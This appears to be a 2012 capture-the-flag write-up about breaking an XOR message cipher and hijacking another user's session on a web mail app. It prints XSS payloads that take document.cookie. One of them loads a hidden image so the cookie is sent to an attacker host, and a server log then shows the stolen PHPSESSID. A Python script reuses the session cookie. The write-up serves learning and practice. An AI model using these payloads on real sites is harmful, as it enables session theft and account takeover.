Begin
Register at http://128.238.66.214/login.php
Send yourself messages until you figure out how the algorithm for encrypting works.
Cipher
In short, it is an XOR algorithm which works like this
enc[0] = IV ^ KEY ^ PLAINTEXT[0] # PLAINTEXT[0] and enc[0] is equal 8bytes
enc[1] = KEY ^ enc[0] ^ PLAINTEXT[1]
enc[2] = KEY ^ enc[1] ^ PLAINTEXT[2]
...
This works both ways for encrypting and decrypting. The IV can be found out relative easily we set PLAINTEXT[0] = KEY and we get the following IV ['0x17', '0x34', '0x17', '0x39', '0x11', '0x35', '0x24', '0x36'].
XSS
We can now proceed to get Dogs' SessionID. After injecting
<form id="f" method="POST" action="compose.php">
<input name="to" value="test12">
<input name="title" value="pw">
<input name="key" value="a">
<input name="text" id="t">
</form>
<script>
document.getElementById("t").value=document.cookie;document.getElementById("f").submit();
</script>
through the text field, we see... NOTHING. Apparently Dog has read its mail(message changes color when read), but doesn't reply back. The next try looks like this
<script>var url="http://$URL$?session="+document.cookie,theimg = document.createElement("img");theimg.src=url;document.body.appendChild(theimg);theimg.style.display="none";</script>
Meanwhile on the serverside:>>128.238.. - - [30/Sep/2012:04:08:56 +0200] \"GET /?session=PHPSESSID=****3208r7aj40 HTTP/1.1\" 200 8937 \"http://localhost/download.php?id=101649\" \"Mozilla/5.0 (X11; Ubuntu; Linux i686; rv:15.0) Gecko/20100101 Firefox/15.0.1
Hello, yes this is dog
Change your session ID to dog, check messages id 1 to 6 (http://128.238.66.214/download.php?id=)
{
1: "\x1c\x30\x11\x2f\x5c\x67\x0a\x12\x32\x2e\x2b\x14\x79\x4b\x1a\x3a\x15\x1c\x0c\x2a\x53\x5d\x28\x1a\x34\x23\x2e\x1b\x44\x45\x28\x39\x3a\x22\x36\x7a\x33\x20\x5b\x56",
2: "\x17\x75\x56\x78\x50\x74\x65\x77",
3: "\x1d\x19\x2a\x01\x35\x04\x00\x05\x38\x33\x0d\x3d\x11\x2d\x49\x4e",
4: "\x17\x75\x56\x78\x50\x74\x65\x77",
5: "\x61\x47\x61\x4d\x6b\x49\x5a\x5b",
6: "\x17\x75\x56\x78\x50\x74\x65\x77",
}
and check the titles(5 Cat key is ILIKECARROTS). With this key we can read some of the messages and go further into the rabbit-hole. With the obove key we decrypt all messages which results in one particular message: Catsareawesome.
After decrypting all the messages with this key and we get: Here, KEY{ITHISISAFLOwEERPOTTytPos} . Finished.
#!/usr/bin/env python
# by spq
import re
import urllib
import urllib2
def compose(_to, _title, _key, _text):
r = opener.open(
"http://128.238.66.214/compose.php",
urllib.urlencode({"to": _to, "title": _title, "key": _key, "text": _text}),
)
def get_last_msgid():
p = re.compile('download[.]php[?]id=([0-9]+)"')
last = None
for m in p.finditer(opener.open("http://128.238.66.214/outbox.php").read()):
last = m.group(1)
return last
def get_msg(i):
r = opener.open("http://128.238.66.214/download.php?id=" + i).read()
return r[619:-31]
def get_last_msg():
return get_msg(get_last_msgid())
opener = urllib2.build_opener()
opener.addheaders.append(("Cookie", "PHPSESSID=$SESSSION"))
def xor(a, b):
assert len(a) == len(b)
ret = ""
for i in xrange(0, len(a)):
ret += chr(ord(a[i]) ^ ord(b[i]))
return ret
def enc(key, text):
iv = "\x17\x34\x17\x39\x11\x35\x24\x36"
result = ""
while len(text) % 8:
text += chr("\x00")
extendedkey = key
while len(extendedkey) < len(text):
extendedkey += key
for i in xrange(0, len(text), 8):
part = text[i : i + 8]
result += xor(xor(extendedkey[i : i + 8], iv), part)
iv = part
return result
